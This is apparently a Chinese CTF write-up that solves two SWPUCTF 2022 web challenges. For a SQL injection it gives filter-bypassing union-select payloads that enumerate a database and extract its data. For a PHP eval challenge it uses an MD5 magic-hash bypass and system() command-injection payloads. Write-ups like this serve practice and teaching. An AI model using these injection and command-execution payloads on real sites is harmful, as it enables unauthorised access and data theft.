NSSCTF做题(10)

叫10好听一点,就是补9的 第7页的内容

[SWPUCTF 2022 新生赛]ez_sql

get传参说是不安全,那就只能用post了

NSSCTF做题(10)_第1张图片 有回显了,两个假的flagNSSCTF做题(10)_第2张图片

 发现万能密码  1' or 1=1#变成了  1=1#    1=1# 1  1=1#=1# 1=1# 1=1#

NSSCTF做题(10)_第3张图片

发现or和空格都无了,union也过滤

空格可以用/**/来代替,union可以双写绕过

知道了大概的过滤,就直接开注

nss=2'/**/ununionion/**/select/**/1,2,3;#

NSSCTF做题(10)_第4张图片 成功绕过,回显位 2,3

查库:nss=2'/**/ununionion/**/select/**/1,database(),3;#

NSSCTF做题(10)_第5张图片

查表:nss=2'/**/ununionion/**/select/**/1,database(),group_concat(table_name)/**/from/**/infoorrmation_schema.tables/**/where/**/table_schema='NSS_db';#NSSCTF做题(10)_第6张图片

 查字段:nss=2'/**/ununionion/**/select/**/1,database(),group_concat(column_name)/**/from/**/infoorrmation_schema.columns/**/where/**/table_name='NSS_tb';#

NSSCTF做题(10)_第7张图片 查数据:nss=2'/**/ununionion/**/select/**/1,group_concat(Secr3t),group_concat(flll444g)/**/from/**/NSS_tb;#    得到flagNSSCTF做题(10)_第8张图片

[SWPUCTF 2022 新生赛]webdog1__start

NSSCTF做题(10)_第9张图片

 f12看源码 源代码里边的


 传参,md5值相等,试着用数组绕过结果不行,那就用科学计数法

?web=0e215962017

NSSCTF做题(10)_第10张图片

还是查看源代码,得到robots.txt提示,访问得到一堆乱码,还有一个fl4g.php

NSSCTF做题(10)_第11张图片

不说了直接访问

NSSCTF做题(10)_第12张图片

源代码里也没什么东西,抓个包看看,发现有提示

NSSCTF做题(10)_第13张图片

 访问一下F1l1l1l1l1lag.php,代码审计

NSSCTF做题(10)_第14张图片

  1. isset($_GET['get'])检查是否存在名为的GET参数。

  2. 如果参数存在,将其赋值给变量。

  3. strstr($get, " ")检查中是否包含空格。

  4. 如果中不包含空格,使用函数将中的所有“flag”替换为空格。这可能是为了防止对flag进行直接访问。

  5. 如果的长度大于18个字符,输出“This is too long.”并终止脚本的执行。

  6. 如果的长度小于等于18个字符,使用函数执行中的内容。函数可以执行字符串形式的PHP代码。

  7. 如果中包含空格,输出“nonono”并终止脚本的执行

可以看到有eval函数,命令执行没得跑了  输入命令?get=system('ls');

NSSCTF做题(10)_第15张图片

 看到了flag.php 尝试访问,绕过空格的方法,绕过flag就可以用通配符/f*来绕过

NSSCTF做题(10)_第16张图片

得到flag  ?get=system('cat%09/f*');

NSSCTF做题(10)_第17张图片 

你可能感兴趣的:(java,开发语言)